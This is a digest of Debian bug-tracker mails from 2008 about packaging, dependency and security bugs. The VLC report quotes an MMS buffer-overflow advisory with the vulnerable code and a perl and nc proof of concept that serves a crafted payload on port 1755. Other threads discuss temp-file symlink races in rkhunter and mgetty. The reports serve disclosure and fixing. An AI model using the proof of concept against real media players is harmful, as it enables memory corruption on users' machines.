Processed: force merge all bugs around the broken build-conflict
Processing commands for [EMAIL PROTECTED]:
# Just found the two other bugs about the issue
forcemerge 495246 495108 496532
Bug#495246: version syntax error in Build-Conflicts (unexpanded substvar
${Source-Version})
Bug#495108: xosd source package control info contains unexpanded variable
Bug#496532: Build-Conflict field is wrong
Forcibly Merged 495108 495246 496532.
thanks
Stopping processing here.
Please contact me if you need assistance.
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496748: jppy: Missing dependency on python-vobject
Package: jppy Version: 0.0.47-1 Severity: grave Justification: renders package unusable Subject says it all: jppy Traceback (most recent call last): File /usr/bin/jppy, line 3, in module import jppy File /var/lib/python-support/python2.5/jppy/__init__.py, line 35, in module from vcard import load_vcards File /var/lib/python-support/python2.5/jppy/vcard.py, line 3, in module import vobject So a recommendation is not enough if I can't even start jppy without python-vobject. Alex -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Kernel: Linux 2.6.26-1-686 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages jppy depends on: ii python2.5.2-2An interactive high-level object-o ii python-jppy 0.0.47-1 Python API to access J-Pilot conta Versions of packages jppy recommends: ii jpilot1.6.0-1graphical app. to modify the conte ii python-vobject0.6.0-1parse iCalendar and VCards in Pyth pn txt2pdbdocnone (no description available) Versions of packages jppy suggests: ii jppy-jpilot-plugins 0.0.47-1 J-Pilot plugins to integrate jppy ii mutt 1.5.18-4 text-based mailreader supporting M -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#495209: marked as done (still fails to build on ia64)
Your message dated Wed, 27 Aug 2008 06:32:03 + with message-id [EMAIL PROTECTED] and subject line Bug#495209: fixed in guile-1.8 1.8.5+1-4 has caused the Debian Bug report #495209, regarding still fails to build on ia64 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 495209: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=495209 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: guile-1.8 Version: 1.8.5+1-3 Severity: serious see http://buildd.debian.org/fetch.cgi?pkg=guile-1.8ver=1.8.5%2B1-3arch=ia64stamp=1218520791file=log the control file is missing the ia64 architecture ---End Message--- ---BeginMessage--- Source: guile-1.8 Source-Version: 1.8.5+1-4 We believe that the bug you reported is fixed in the latest version of guile-1.8, which is due to be installed in the Debian FTP archive: guile-1.8-dev_1.8.5+1-4_i386.deb to pool/main/g/guile-1.8/guile-1.8-dev_1.8.5+1-4_i386.deb guile-1.8-doc_1.8.5+1-4_all.deb to pool/main/g/guile-1.8/guile-1.8-doc_1.8.5+1-4_all.deb guile-1.8-libs_1.8.5+1-4_i386.deb to pool/main/g/guile-1.8/guile-1.8-libs_1.8.5+1-4_i386.deb guile-1.8_1.8.5+1-4.diff.gz to pool/main/g/guile-1.8/guile-1.8_1.8.5+1-4.diff.gz guile-1.8_1.8.5+1-4.dsc to pool/main/g/guile-1.8/guile-1.8_1.8.5+1-4.dsc guile-1.8_1.8.5+1-4_i386.deb to pool/main/g/guile-1.8/guile-1.8_1.8.5+1-4_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Rob Browning [EMAIL PROTECTED] (supplier of updated guile-1.8 package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Tue, 26 Aug 2008 22:58:14 -0700 Source: guile-1.8 Binary: guile-1.8 guile-1.8-dev guile-1.8-doc guile-1.8-libs Architecture: source all i386 Version: 1.8.5+1-4 Distribution: unstable Urgency: medium Maintainer: Rob Browning [EMAIL PROTECTED] Changed-By: Rob Browning [EMAIL PROTECTED] Description: guile-1.8 - The GNU extension language and Scheme interpreter guile-1.8-dev - Development files for Guile 1.8 guile-1.8-doc - Documentation for Guile 1.8 guile-1.8-libs - Main Guile libraries Closes: 495209 Changes: guile-1.8 (1.8.5+1-4) unstable; urgency=medium . * Change Architectures back to any where appropriate (i.e. include ia64). (closes: #495209) Checksums-Sha1: febdf479023c07dbbfc3a00f6ebec49b8c2a5b8c 1150 guile-1.8_1.8.5+1-4.dsc 9c68529e06ac425225ab03a8f215cc282b7129c7 208926 guile-1.8_1.8.5+1-4.diff.gz 47cf9a5876f43b030ee9c78931c0abead67386da 112968 guile-1.8-doc_1.8.5+1-4_all.deb 132fd18c6a10ea5f817ecd3a6bc82a5e7bc99071 8760 guile-1.8_1.8.5+1-4_i386.deb ea13d4c3ea1d70585fc7058576ed3e41cdbfc025 562714 guile-1.8-dev_1.8.5+1-4_i386.deb 1dd7740b73a4b4e13504dad4ec06151552915c78 717662 guile-1.8-libs_1.8.5+1-4_i386.deb Checksums-Sha256: 9cb98b4d9af1236910f25b65123f8d6a80da88bd8bd464d2b9a86f22cf594463 1150 guile-1.8_1.8.5+1-4.dsc 4be3077a574b926226f0a4653bb45e8babb04ca9d2e7cc2ae6070fde7a6da5f5 208926 guile-1.8_1.8.5+1-4.diff.gz de5e6916c0fc73ac7f9111893ba1395bfcac83c2979d23a7bbe93787981133e8 112968 guile-1.8-doc_1.8.5+1-4_all.deb 89a86f88cec2db1aa27e531d7b9ecf2df8d26b70ac9ef1816df00a147c4bd501 8760 guile-1.8_1.8.5+1-4_i386.deb 4c9e42301130c4561aa341fee7538960548e36486f1edf67fe9140afc10e6f30 562714 guile-1.8-dev_1.8.5+1-4_i386.deb 2be090c2ab14ae7ff0fbdadf1a0bf441325230701575205ac2872191d676b682 717662 guile-1.8-libs_1.8.5+1-4_i386.deb Files: 46a937bb112c3913c033b7169813b77a 1150 interpreters optional guile-1.8_1.8.5+1-4.dsc 56b350aaf615cf651fa83ac422f0484f 208926 interpreters optional guile-1.8_1.8.5+1-4.diff.gz 5b33b00f0876550c2032b8cb99ec20dc 112968 doc optional guile-1.8-doc_1.8.5+1-4_all.deb 46ff341f1e7700e2e44283e6738e7525 8760 interpreters optional guile-1.8_1.8.5+1-4_i386.deb 336a643052b44382942c8f052e68fba8 562714 devel optional guile-1.8-dev_1.8.5+1-4_i386.deb bb875dc9d0cd989553d577a88dc1391e 717662 libs optional guile-1.8-libs_1.8.5+1-4_i386.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAki08KgACgkQJcjTd4x+c6Sa5gCeOxmiROqXPIatVjxNmfNmlg0H CxUAoMAriBiHhdwlUJCDSwJ4bp0+n1t/ =VBF8 -END PGP SIGNATURE- ---End Message---
Bug#496375: The possibility of attack with the help of symlinks in some Debian packages
Hi Alexander, Many thanks for your email. I have been willing to review rkhunter bugs before submitting it. Le mercredi 27 août 2008 à 04:00 +0400, Solar Designer a écrit : FWIW, I happened to independently notice this and report it upstream a week ago: https://sourceforge.net/tracker/?func=detailatid=794190aid=1971965group_id=155034 While I am at it, I suggest that you change /tmp/rkhunter-debug to /var/run/rkhunter-debug. Right now, you have a security hole allowing for local root compromise, although indeed the race condition is hard to trigger in practice. To those reading this: please note that this suggestion by no means constitutes a security review of rkhunter by me. I notice that the Debian package was fixed to use mktemp; I think that a fixed filename under /var/run would be better in this case. Also, rkhunter could be patched to enforce mode 600 on the file, regardless of umask. (mktemp does that, but when a fixed filename under /var/run is used instead, that would need to be explicit.) Oh, and I was probably wrong about the race condition being hard to trigger - I forgot about directory notifications for a moment. I am far from being a security expert. Do you suggest that using /var/run/rkhunter-debug is better than /tmp/rkhunter-debug. (created using mktemp)? or is that still using mktemp to create a /var/run/rkhunter-debug.XX file? Can you explain why it is more secure? I am ready to patch rkhunter debian package, but need to be sure I understand well what I do! Thanks again for your help. Cheers, Julien -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496403: mgetty insecure temp file usage
Hi Thijs! # get unique directory name, using faxq-helper This does not seem to be much of an issue beyond DoS, right? mkdir returns an error when $spooldir already exists. Yeah, 'mktemp -t -d' looks like a better alternative though... # if filename is -, use stdin I noticed that following patch is used in all Fedora / Red Hat mgetty packages for quite some time now: http://cvs.fedoraproject.org/viewvc/rpms/mgetty/devel/mgetty-1.1.30-mktemp.patch?view=markup (it can possibly benefit from few more Xes in file name template too ;) HTH -- Tomas Hoger -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: tagging 490910
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.9.26 tags 490910 + pending Bug#490910: linux-2.6: CVE-2008-0598 information disclosure Tags were: patch security Tags added: pending End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: merge
Processing commands for [EMAIL PROTECTED]: merge 496558 496678 Bug#496558: nautilus: Fails to browse Bug#496678: nautilus: Fails to start Merged 496558 496678. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: ...
Processing commands for [EMAIL PROTECTED]: tags 496558 +confirmed Bug#496558: nautilus: Fails to browse There were no tags set. Bug#496678: nautilus: Fails to start Tags added: confirmed thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496375: The possibility of attack with the help of symlinks in some Debian packages
On Wed, Aug 27, 2008 at 09:06:58AM +0200, Julien Valroff wrote: Do you suggest that using /var/run/rkhunter-debug is better than /tmp/rkhunter-debug. (created using mktemp)? Yes - primarily from usability standpoint. This time, having a fixed filename is better, and since rkhunter needs to be run as root anyway (does it?), /var/run should do and be safe. However, if I am wrong in my assumption that rkhunter requires root, then indeed /var/run is not appropriate - and the mktemp approach makes sense. or is that still using mktemp to create a /var/run/rkhunter-debug.XX file? No. Can you explain why it is more secure? That was not the point I was making. Rather, the point was/is that mktemp is normally used for program-internal and truly temporary files, and this time we have a file that is meant to be accessed by a human user - so a fixed filename in a directory only writable by root may be more appropriate. However, once again, if rkhunter may reasonably be run by non-root (I just don't know, I've never used rkhunter), then mktemp -t ... may be appropriate as it will retain that capability. Alexander -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496558: nautilus: Fails to browser - confirmed
I found this error too (but on a etch version). And it seems to me that the last (security) upgrade of libxml2 and/or libmxl2-utils caused this error. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496558: nautilus: Fails to browser - confirmed
On Wed, 27 Aug 2008 10:33:13 +0200, Dieter Faulbaum [EMAIL PROTECTED] wrote: I found this error too (but on a etch version). And it seems to me that the last (security) upgrade of libxml2 and/or libmxl2-utils caused this error. Could you please provide the exact version number of your installed nautilus? Have you tried downgrading libxml2 again? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#493667: nfs-common: nfs quite broken
Hi, I experiment the same problem in my lab which has an etch nfs server. When stations are upgraded to nfs-common 1:1.1.3-1, users cannot access their files. Adding sec=sys to the client's mount options fix the problem. As I found the fix in Debian bug report, I did not make yet another bug report. However, as you ask for the success of the proposed workaround, I can confirm it for my case. But I would like to know if you recommend adding this option on all clients or if you will think it will be solved (in the kernel or in nfs-common) before this bugs reaches testing (was it for lenny or lenny+1) Best regards, Vincent -- Vincent Danjean GPG key ID 0x9D025E87 [EMAIL PROTECTED] GPG key fingerprint: FC95 08A6 854D DB48 4B9A 8A94 0BF7 7867 9D02 5E87 Unofficial pacakges: http://www-id.imag.fr/~danjean/deb.html#package APT repo: deb http://perso.debian.org/~vdanjean/debian unstable main -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496758: Too late for lenny
Package: ia32-libs-tools Version: 12 Severity: critical This is just a reminder notice to stop any migrating to lenny. It took way too long to get ia32-libs-tools through NEW and there just isn't enough time left to get this tested and fixed properly. Do not include ia32-libs-tools in lenny. MfG Goswin -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (400, 'unstable-i386') Architecture: amd64 (x86_64) Kernel: Linux 2.6.25-kvm-nofb (SMP w/2 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages ia32-libs-tools depends on: ii aptitude 0.4.11.8-1 terminal-based package manager ii build-essential 11.3 informational list of build-essent ii dctrl-tools [grep-dctrl] 2.13.0 Command-line tools to process Debi ii devscripts2.10.33scripts to make the life of a Debi ii libc6 2.7-12 GNU C Library: Shared libraries ii libgcc1 1:4.3.1-5 GCC support library ii libstdc++64.3.1-5The GNU Standard C++ Library v3 ii lsb-release 3.2-13 Linux Standard Base version report ia32-libs-tools recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496625: Problem with multicast communication (plus solution)
On Tue, Aug 26, 2008 at 11:52:18AM -0500, Eric Evans wrote: Yes, you are correct. A fix for this was incorporated into the final release (1.5), which I uploaded to unstable last night. If you are in a position to test it, any feedback would be appreciated. I test ucarp 1.5-1 from unstable and all problems gone away. Mny thanks! -- Piotr 'aniou' Meyer -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#495354: [DebianGIS-dev] Bug#495354: gdalinfo segfaults on a 6.2Mib netCDF file
severity 495354 normal thanks This is not grave, the package is perfectly usable with many other formats. I will investigate with upstream about that. Also consider that netcdf support is partially broken because hdf4 is historically built in a not completely gdal-compliant way. That's is solved in experimental. On Sat, Aug 16, 2008 at 11:29:29AM -0300, Paulo Marcondes wrote: Subject: gdal-bin: gdalinfo segfaults on a 6.2MiB netCDF file Package: gdal-bin Version: 1.5.2-3 Severity: grave Justification: renders package unusable *** Please type your report below this line *** I got a segmentation fault when running gdalinfo 3n24s47w14w.grd file was downloaded from http://www.bodc.ac.uk/data/online_delivery/gebco/select/ $ ls -lh *.grd -rw-r--r-- 1 marcondes marcondes 6,2M Ago 16 00:46 3n24s47w14w.grd file is attached as bzip2 file. -- Francesco P. Lovergine -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: [DebianGIS-dev] Bug#495354: gdalinfo segfaults on a 6.2Mib netCDF file
Processing commands for [EMAIL PROTECTED]: severity 495354 normal Bug#495354: gdalinfo segfaults on a 6.2Mib netCDF file Bug#495353: gdal-bin: gdalinfo segfaults on a 6.2Mib netCDF file Severity set to `normal' from `grave' thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: The possibility of attack with the help of symlinks in some Debian packages
Processing commands for [EMAIL PROTECTED]: severity 496382 normal Bug#496382: The possibility of attack with the help of symlinks in some Debian packages Severity set to `normal' from `grave' thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496122: new upstream version of libfile-sharedir-perl
Hi,
libfile-sharedir-perl has a currently a grave bug because the directory
layout used to store data has changed. This means the package is
unusable for Perl distributions whose name contains a - and
a recent Module::Install (= 0.76, released on 17 Jul 2008 and included in
Lenny), see #496122.
This was fixed in version 0.99_01 (also released as 1.00 without
changes), which was released coordinated with Module::Install on
Jul 17th.
Besides updating tests and the build system (new version of
Module:Install) there are only two non-bugfix changes in the new
upstream release:
* A new function `class_file' that will look for data
files in the namespaces of parent classes (36 lines long), and
* the other `*_file' functions will allow searching for any kind of
path, not only regular files (changes some tests for (regular) files to
tests if path exists)
As these other changes are not very large, I would like to know if the release
team would accept the new upstream release for Lenny instead of backporting the
fixes and updates to tests.
Regards,
Ansgar
Links to upstream tarballs:
0.05 -
http://search.cpan.org/CPAN/authors/id/A/AD/ADAMK/File-ShareDir-0.05.tar.gz
1.00 -
http://search.cpan.org/CPAN/authors/id/A/AD/ADAMK/File-ShareDir-1.00.tar.gz
Full changelog for upstream changes:
1.00 Thu 17 Jul 2008
- Everything appears ok, release prod
0.99_01 Thu 10 Jul 2009
- Updating tests a little
- Adding the class_file function
- Allow *_file to find any kind of path, not just files (hdp)
- Localising $@ during evals
- Implementing the new sharedir model
Diffstat between 0.05 and 1.00:
Changes| 10
MANIFEST |7
META.yml | 27 +
Makefile.PL| 22 -
README | 41 ++
foo/test_file.txt |1
inc/Module/Install.pm | 437 ---
inc/Module/Install/Base.pm |6
inc/Module/Install/Can.pm |2
inc/Module/Install/Fetch.pm|2
inc/Module/Install/Makefile.pm | 333 +++--
inc/Module/Install/Metadata.pm | 650
+
inc/Module/Install/Share.pm| 45 ++
inc/Module/Install/Win32.pm| 13
inc/Module/Install/WriteAll.pm | 55 +--
lib/File/ShareDir.pm | 253 ++-
share/subdir/sample.txt|7
t/01_compile.t | 13
t/02_main.t| 52 +--
t/97_meta.t| 27 +
t/98_pod.t | 32 ++
t/99_pmv.t | 27 +
t/99_pod.t | 36 --
t/lib/ShareDir.pm | 11
24 files changed, 1385 insertions(+), 724 deletions(-)
Changes to lib/File/ShareDir.pm (minus documentation only hunks):
The internal function _dist_packfile is not used anywhere.
--- File-ShareDir-0.05/lib/File/ShareDir.pm 2006-09-04 02:52:56.0
+0200
+++ File-ShareDir-1.00/lib/File/ShareDir.pm 2008-07-17 09:58:40.0
+0200
@@ -104,22 +107,29 @@
use 5.005;
use strict;
-use base 'Exporter';
use Carp 'croak';
+use Config ();
+use Exporter ();
use File::Spec ();
use Params::Util '_CLASS';
use Class::Inspector ();
-use vars qw{$VERSION $IS_MACOS @EXPORT_OK %EXPORT_TAGS};
+use vars qw{$VERSION @ISA @EXPORT_OK %EXPORT_TAGS};
BEGIN {
- $VERSION = '0.05';
- $IS_MACOS= $^O eq 'MacOS';
- @EXPORT_OK = qw{dist_dir dist_file module_dir module_file};
+ $VERSION = '1.00';
+ @ISA = qw{ Exporter };
+ @EXPORT_OK = qw{
+ dist_dir dist_file
+ module_dir module_file
+ class_dir class_file
+ };
%EXPORT_TAGS = (
ALL = [ @EXPORT_OK ],
- );
+ );
}
+use constant IS_MACOS = !!($^O eq 'MacOS');
+
The Cdist_dir function takes a single parameter of the name of an
@@ -145,11 +155,49 @@
sub dist_dir {
my $dist = _DIST(shift);
+ my $dir;
+
+ # Try the new version
+ $dir = _dist_dir_new( $dist );
+ return $dir if defined $dir;
+
+ # Fall back to the legacy version
+ $dir = _dist_dir_old( $dist );
+ return $dir if defined $dir;
+
+ # Ran out of options
+ croak(Failed to find share dir for dist '$dist');
+}
+
+sub _dist_dir_new {
+ my $dist = shift;
+
+ # Create the subpath
+ my $path = File::Spec-catdir(
+ 'auto', 'share', 'dist', $dist,
+ );
+
+ # Find the full dir withing @INC
+ foreach my $inc ( @INC ) {
+ next unless defined $inc and ! ref $inc;
+ my $dir = File::Spec-catdir( $inc, $path );
+ next unless -d
Bug#496265: marked as done (vlc: buffer overflow in mms handling)
Your message dated Wed, 27 Aug 2008 09:47:13 +
with message-id [EMAIL PROTECTED]
and subject line Bug#496265: fixed in vlc 0.8.6.i-2
has caused the Debian Bug report #496265,
regarding vlc: buffer overflow in mms handling
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
496265: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496265
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: vlc
Version: 0.8.6.i-1
Severity: grave
Tags: security
Hi,
the following security issue was published for vlc
static int mms_ReceiveCommand( access_t *p_access )
{
access_sys_t *p_sys = p_access-p_sys;
for( ;; )
{
int i_used;
int i_status;
if( NetFillBuffer( p_access ) 0 )
{
msg_Warn( p_access, cannot fill buffer );
return VLC_EGENERIC;
}
if( p_sys-i_buffer_tcp 0 )
{
[1] i_status = mms_ParseCommand( p_access, p_sys-buffer_tcp,
p_sys-i_buffer_tcp, i_used );
[2] if( i_used MMS_BUFFER_SIZE )
{
[3] memmove( p_sys-buffer_tcp, p_sys-buffer_tcp + i_used,
MMS_BUFFER_SIZE - i_used );//BUG! i_used overflow
(...)
[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written
static int mms_ParseCommand( access_t *p_access,
uint8_t *p_data,
int i_data,
int *pi_used )
(...)
i_length = GetDWLE( p_data + 8 ) + 16;
(...)
if( i_length p_sys-i_cmd )
{
msg_Warn( p_access,
truncated command (missing %d bytes),
i_length - i_data );
p_sys-i_command = 0;
return -1;
}
[1] else if( i_length p_sys-i_cmd )
{
p_sys-i_cmd = i_length;
[2] *pi_used = i_length;
}
(...)
[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand
- - Proof of concept -
on localhost:
perl -e 'print \xce\xfa\x0b\xb0\xef\xff\xef\xff; print ax100' headshot
nc -l -v -p 1755 headshot
open this url in VLC:
mmst://127.0.0.1/
I can confirm this issue exists.
Please see http://www.orange-bat.com/adv/2008/adv.08.24.txt for the original
advisory.
I'll follow up on this bug report with a CVE id soon.
Kind regards
Nico
--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
pgpJvvvyeo4kv.pgp
Description: PGP signature
---End Message---
---BeginMessage---
Source: vlc
Source-Version: 0.8.6.i-2
We believe that the bug you reported is fixed in the latest version of
vlc, which is due to be installed in the Debian FTP archive:
libvlc0-dev_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/libvlc0-dev_0.8.6.i-2_amd64.deb
libvlc0_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/libvlc0_0.8.6.i-2_amd64.deb
mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
vlc-nox_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-nox_0.8.6.i-2_amd64.deb
vlc-plugin-arts_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-plugin-arts_0.8.6.i-2_amd64.deb
vlc-plugin-esd_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-plugin-esd_0.8.6.i-2_amd64.deb
vlc-plugin-ggi_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.i-2_amd64.deb
vlc-plugin-jack_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-plugin-jack_0.8.6.i-2_amd64.deb
vlc-plugin-sdl_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.i-2_amd64.deb
vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
vlc_0.8.6.i-2.diff.gz
to pool/main/v/vlc/vlc_0.8.6.i-2.diff.gz
vlc_0.8.6.i-2.dsc
to pool/main/v/vlc/vlc_0.8.6.i-2.dsc
vlc_0.8.6.i-2_amd64.deb
to pool/main/v/vlc/vlc_0.8.6.i-2_amd64.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Sam Hocevar (Debian packages) [EMAIL PROTECTED] (supplier of updated vlc
package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Format: 1.8
Date: Tue, 26 Aug 2008
Bug#495712: wine: does not start
On Tue, Aug 19, 2008 at 11:21:52PM +0200, M. KLEIN wrote: Package: wine Version: 1.0.0-1 Severity: grave Justification: renders package unusable [EN] Any wine* commande (wine, winecfg ...) produces the following message, but nothing else append: /usr/bin/wine: line 63: /usr/lib/wine/wine.bin: Aucun fichier ou répertoire de ce type /usr/bin/wine: line 63: /usr/lib/wine/wine.bin: Succès I've tried to purge wine package, without succes. This isn't a general bug, since I've tried to succesfully run apps with both amd64 and i386. How exactly did you start wine? Aucun fichier ou répertoire de ce type means No such file or directory I suppose? Can you please post the output of ls /usr/lib/wine/wine.bin? Cheers, Moritz -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496382: The possibility of attack with the help of symlinks in some Debian packages
severity 496382 normal thanks On Sun, Aug 24, 2008 at 10:05:30PM +0400, Dmitry E. Oboukhov wrote: Package: bulmages-servers Severity: grave Binary-package: bulmages-servers (0.11.1-2) file: /usr/share/bulmages/examples/scripts/actualizabulmacont file: /usr/share/bulmages/examples/scripts/installbulmages-db file: /usr/share/bulmages/examples/scripts/creabulmafact file: /usr/share/bulmages/examples/scripts/creabulmacont file: /usr/share/bulmages/examples/scripts/actualizabulmafact I'm lowering the severity since the affected scripts are only example scripts. Cheers, Moritz -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Remove forwarded tag
Processing commands for [EMAIL PROTECTED]: # The upstream bug is for xmonad, and this issue is unrelated. notforwarded 496677 Bug#496677: Cairo backend unusable on 64-bit architectures Removed annotation that Bug had been forwarded to https://savannah.gnu.org/bugs/index.php?24083. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: update found field...
Processing commands for [EMAIL PROTECTED]: # as reported by Dieter Faulbaum... found 496558 2.4.13-11+b1 Bug#496558: nautilus: Fails to browse Bug#496678: nautilus: Fails to start Bug marked as found in version 2.4.13-11+b1. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#493883: marked as done ([manpages-it] Uninstallable due to overwrite try of /usr/share/man/it/man1/hman.1.gz)
Your message dated Wed, 27 Aug 2008 11:17:03 + with message-id [EMAIL PROTECTED] and subject line Bug#493883: fixed in man-pages-it 2.80-3 has caused the Debian Bug report #493883, regarding [manpages-it] Uninstallable due to overwrite try of /usr/share/man/it/man1/hman.1.gz to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 493883: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=493883 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: manpages-it Version: 0.3.4-5 Severity: serious manpages-it is not installable because tries to overwrite file /usr/share/man/it/man1/hman.1.gz, also provided by package man2html. I don't know whether this issue must be solved by manpages-it or man2html. Setting the severity as serious because I can't install the package. Thank you, Giovanni. # LANG=C apt-get install manpages-it Reading package lists... Done Building dependency tree Reading state information... Done The following packages will be upgraded: manpages-it 1 upgraded, 0 newly installed, 0 to remove and 1 not upgraded. Need to get 0B/499kB of archives. After this operation, 914kB disk space will be freed. (Reading database ... 343588 files and directories currently installed.) Preparing to replace manpages-it 0.3.4-5 (using .../manpages-it_2.80-1_all.deb) ... Unpacking replacement manpages-it ... dpkg: error processing /var/cache/apt/archives/manpages-it_2.80-1_all.deb (--unpack): trying to overwrite `/usr/share/man/it/man1/hman.1.gz', which is also in package man2html dpkg-deb: subprocess paste killed by signal (Broken pipe) Processing triggers for man-db ... Errors were encountered while processing: /var/cache/apt/archives/manpages-it_2.80-1_all.deb E: Sub-process /usr/bin/dpkg returned an error code (1) --- System information. --- Architecture: i386 Kernel: Linux 2.6.25-2-686 Debian Release: lenny/sid 500 unstablewww.debian-multimedia.org 500 unstableftp.it.debian.org 500 testing security.debian.org 500 testing ftp.it.debian.org 500 stable security.debian.org 500 stable ftp.it.debian.org -- Giovanni Mascellani [EMAIL 